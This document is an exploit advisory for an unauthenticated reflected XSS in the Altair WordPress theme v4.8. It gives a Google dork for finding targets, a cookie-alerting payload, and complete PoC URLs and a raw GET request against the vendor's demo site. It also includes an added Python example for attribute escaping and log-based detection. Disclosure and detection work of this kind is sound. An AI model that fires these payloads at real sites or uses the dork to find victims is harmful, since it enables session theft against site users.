[+] :: Exploit Title: Altair WordPress theme v4.8 - Unauthenticated Reflected XSS
[+] :: Google Dork: inurl:/wp-content/themes/altair/
[+] :: Date: 2020-09-10
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: ThemeGoods [ https://themegoods.com ]
[+] :: Software Version: 4.8
[+] :: Software Link: https://themeforest.net/item/tour-travel-agency-altair-theme/9318575
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79
[i] :: Info:
An Unauthenticated Reflected XSS vulnerability was discovered in the Altair theme v4.8 for WordPress.
Vulnerable parameters: keyword, start_date, start_date_raw, end_date, end_date_raw, budget.
[$] :: Payload:
"><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);>
[!] :: PoC:
https://themes.themegoods.com/altair/demo/tour-grid-fullwidth/?keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&budget=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E
[!] :: PoC (Burp Suite):
GET /altair/demo/tour-grid-fullwidth/?keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&budget=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E HTTP/1.1
Host: themes.themegoods.com
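The PoC above works because the six listed GET parameters are reflected into the page without attribute-context escaping, so a leading `">` closes the quoted attribute and the rest of the value becomes markup. The following Python is an added defender's example, not code from the advisory or from the Altair theme: it models a search-form field rendered with and without escaping (the hardened path does what WordPress's esc_attr() does for the quote and angle-bracket characters), and it scans constructed access-log lines for requests whose values for these parameter names contain attribute-breaking characters. The log lines, IPs and paths are made up for the example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names the advisory lists as reflected by the theme.
VULNERABLE_PARAMS = ("keyword", "start_date", "start_date_raw",
                     "end_date", "end_date_raw", "budget")


def render_search_field(name: str, value: str, escape: bool = True) -> str:
    """Render an <input> whose value attribute reflects a request parameter.

    escape=False reproduces the defect class from the advisory: the raw value
    lands inside a double-quoted attribute. escape=True applies HTML attribute
    escaping (html.escape with quote=True), the equivalent of esc_attr() in
    WordPress, so '"', '<' and '>' can no longer terminate the attribute.
    """
    rendered_value = html.escape(value, quote=True) if escape else value
    return f'<input type="text" name="{name}" value="{rendered_value}">'


def breaks_out_of_attribute(rendered: str) -> bool:
    """True when rendering produced more than the single expected tag."""
    return len(re.findall(r"<[a-zA-Z]", rendered)) != 1


# In a double-quoted attribute context, injection needs a '"' to close the
# attribute or '<'/'>' to open a new tag; legitimate dates, keywords and
# budgets never contain these, so this check is cheap and low-noise.
ATTRIBUTE_BREAKERS = re.compile(r'[<>"]')


def flag_request(request_target: str) -> list:
    """Return the vulnerable parameter names whose decoded value contains
    attribute-breaking characters in the given request target (path+query)."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    hits = []
    for name in VULNERABLE_PARAMS:
        if any(ATTRIBUTE_BREAKERS.search(v) for v in params.get(name, [])):
            hits.append(name)
    return hits


# Combined log format: client ip, ident, user, [timestamp], "METHOD target proto", status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines) -> list:
    """Yield (client_ip, request_target, flagged_params) for suspicious lines."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        hits = flag_request(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("target"), hits))
    return findings


# Constructed sample log: one benign search and one attempt to break out of
# the keyword attribute (assumed values, not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2020:12:00:01 +0000] '
    '"GET /tour-grid-fullwidth/?keyword=paris&budget=500 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Sep/2020:12:00:07 +0000] '
    '"GET /tour-grid-fullwidth/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E&budget=500 HTTP/1.1" 200 5210',
]


if __name__ == "__main__":
    probe = '"><img src=x onerror=alert(1)>'
    print("unescaped:", render_search_field("keyword", probe, escape=False))
    print("escaped:  ", render_search_field("keyword", probe, escape=True))
    for ip, target, hits in scan_access_log(SAMPLE_LOG):
        print(f"{ip} -> {target} (params: {', '.join(hits)})")
```

The rendering half shows the whole fix: the same value that yields two tags when reflected raw yields exactly one when attribute-escaped, which is why every reflected parameter in a theme template should pass through esc_attr() (or esc_html() for text nodes). The log half is a starting point for a WAF rule or a SIEM search keyed on these parameter names; it decodes the query string first, so percent-encoded payloads like the PoC are caught.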
[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi